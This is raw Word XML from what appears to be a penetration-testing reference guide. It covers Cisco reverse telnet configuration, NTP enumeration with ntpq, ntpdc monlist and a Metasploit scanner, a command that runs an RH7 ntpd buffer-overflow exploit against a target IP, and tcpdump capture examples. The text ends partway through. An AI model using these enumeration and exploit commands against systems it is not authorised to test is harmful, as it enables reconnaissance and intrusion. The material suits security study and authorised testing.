    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B50C46">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:tab/>
        <w:t>Cisco Reverse Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40CE5" w:rsidRPr="003A6E11" w:rsidRDefault="00B40CE5" w:rsidP="00C14E10">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco reverse telnet is a specialized application of telnet, where the server side of the connection reads and writes data to a TTY line (RS-232 serial port), rather than providing a command shell to the host device. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Through the use of reverse telnet on such a device, IP-networked users can use telnet to access serially-connected devices such as a switch that is not IP enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40CE5" w:rsidRPr="003A6E11" w:rsidRDefault="00B40CE5" w:rsidP="00C14E10">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A6E11" w:rsidRPr="003A6E11" w:rsidRDefault="003A6E11" w:rsidP="00B90047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>To do reverse telnet the aux port of the router must be connected to the console of the device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40CE5" w:rsidRPr="003A6E11" w:rsidRDefault="003A6E11" w:rsidP="00B90047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Then enable the AUX port as follows:</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conf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</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line</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> aux 0</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modem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> InOut</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preferred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input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output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^z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6E11" w:rsidRPr="003A6E11" w:rsidRDefault="003A6E11" w:rsidP="00B90047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Need a loopback address too:</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#conf t</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)#int loopback 0</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if)#ip address 10.0.0.1 255.0.0.0</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if)#no shut</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^z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6E11" w:rsidRPr="003A6E11" w:rsidRDefault="003A6E11" w:rsidP="00B90047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>See what line the AUX port is using</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6E11" w:rsidRPr="003A6E11" w:rsidRDefault="003A6E11" w:rsidP="00B90047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#sh line</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Tty Typ     Tx/Rx    A </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Modem  Roty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccO AccI   Uses   Noise  Overruns   Int</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0 CTY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225 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>AUX  19200</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/19200 - inout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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>*  226</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> VTY              -    -      -    -    -     10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227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228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229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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   230 VTY              -    -      -    -    -      0       0     0/0</w:t>
      </w:r>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6E11" w:rsidRPr="003A6E11" w:rsidRDefault="003A6E11" w:rsidP="00B90047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>telnet to the loop back IP at port 2000+AUX i.e.</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#telnet 10.0.0.1 2226</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6E11" w:rsidRPr="003A6E11" w:rsidRDefault="003A6E11" w:rsidP="00B90047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exit with CTRL+SHIFT+6, press the letter X. Then</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#clear line 226</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6E11" w:rsidRPr="003A6E11" w:rsidRDefault="003A6E11" w:rsidP="003A6E11">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A6E11" w:rsidRPr="003A6E11" w:rsidRDefault="003A6E11" w:rsidP="003A6E11">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example config</w:t>
      </w:r>
      <w:r w:rsidR="00B90047">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uration</w:t>
      </w:r>
      <w:r w:rsidRPr="003A6E11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reverse telnet setup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40CE5" w:rsidRPr="00B90047" w:rsidRDefault="00B40CE5" w:rsidP="003A6E11">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Current </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>configuration :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3481 bytes</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interface</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Loopback0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ip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> address 10.0.0.1 255.0.0.0</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con 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transport</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> input none</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aux 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modem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> InOut</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transport</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> input all</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speed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 19200</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vty 0 4</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password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> xxxxxxx</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login</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B40CE5" w:rsidRPr="00B90047" w:rsidRDefault="00B40CE5" w:rsidP="003A6E11">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14E10" w:rsidRPr="00B90047" w:rsidRDefault="00B40CE5" w:rsidP="003A6E11">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B50C46">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:tab/>
        <w:t>NTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="007D4126" w:rsidRDefault="002A1F69" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Network Time Protocol (NTP) is a protocol for synchronizing the clocks of computer systems over</w:t>
      </w:r>
      <w:r w:rsidR="007E23F6" w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a network</w:t>
      </w:r>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. NTP uses UDP on port 123 as its transport layer. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E23F6" w:rsidRPr="007D4126" w:rsidRDefault="007E23F6" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3CC7" w:rsidRPr="007D4126" w:rsidRDefault="00AD3CC7" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Information retrieval via NTP if the service is conf</w:t>
      </w:r>
      <w:r w:rsidR="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">igured to accept the readvar, </w:t>
      </w:r>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>peers</w:t>
      </w:r>
      <w:r w:rsidR="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, and monlist</w:t>
      </w:r>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> command:</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ntpq</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> –c readvar &lt;ip address&gt;</w:t>
      </w:r>
      <w:r w:rsidR="007D4126" w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007D4126" w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007D4126" w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etails of</w:t>
      </w:r>
      <w:r w:rsidR="007D4126" w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS/version</w:t>
      </w:r>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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ntpq</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> –c peers &lt;ipaddres&gt;</w:t>
      </w:r>
      <w:r w:rsidR="007D4126" w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007D4126" w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007D4126" w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007D4126" w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ntp peers</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ntpdc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n -c monlist &lt;ip address&gt;</w:t>
      </w:r>
      <w:r w:rsidR="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>last 600 clients (good for targets info)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3CC7" w:rsidRPr="007D4126" w:rsidRDefault="00AD3CC7" w:rsidP="00AD3CC7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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metasploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (aux - scanner/ntp/ntp_monlist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3CC7" w:rsidRPr="007D4126" w:rsidRDefault="00AD3CC7" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E23F6" w:rsidRPr="007D4126" w:rsidRDefault="007E23F6" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Specific NTP vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E23F6" w:rsidRPr="007D4126" w:rsidRDefault="007E23F6" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RH7 ntpd Remote Buffer Overflow Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="007D4126" w:rsidRDefault="007E23F6" w:rsidP="007D4126">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>./ntpd-exp-rh7.0 –t2 &lt;ip address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E38B0" w:rsidRDefault="006E38B0" w:rsidP="006E38B0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>D2 - Network Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E38B0" w:rsidRDefault="006E38B0" w:rsidP="006E38B0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>D2a - Techniques for local network traffic analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E38B0" w:rsidRPr="0039713D" w:rsidRDefault="00FE755E" w:rsidP="006E38B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00623A04" w:rsidRPr="0039713D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a graphical user interface and lots of protocol dissectors so it easy to use.</w:t>
      </w:r>
      <w:r w:rsidR="0039713D" w:rsidRPr="0039713D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wireshark can use pcap capture filters and also its own display filters. Follow TCP/UDP streams are very useful for communication protocol analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039713D" w:rsidRPr="0039713D" w:rsidRDefault="0039713D" w:rsidP="000B2BCF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00623A04" w:rsidRPr="0039713D" w:rsidRDefault="0039713D" w:rsidP="006E38B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Linux command line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00623A04"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w:t>
      </w:r>
      <w:r w:rsidR="00623A04" w:rsidRPr="0039713D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cpdump</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -nxvvv –C 20 –w capture </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039713D" w:rsidRPr="0039713D" w:rsidRDefault="0039713D"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tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –nxv –r capture &lt;filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E38B0" w:rsidRPr="0039713D" w:rsidRDefault="006E38B0" w:rsidP="006E38B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B2BCF" w:rsidRPr="0039713D" w:rsidRDefault="000B2BCF" w:rsidP="000B2BCF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Capture filter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> examples:</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172.18.5.4 </w:t>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net</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.0.0/24 </w:t>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src</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039713D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
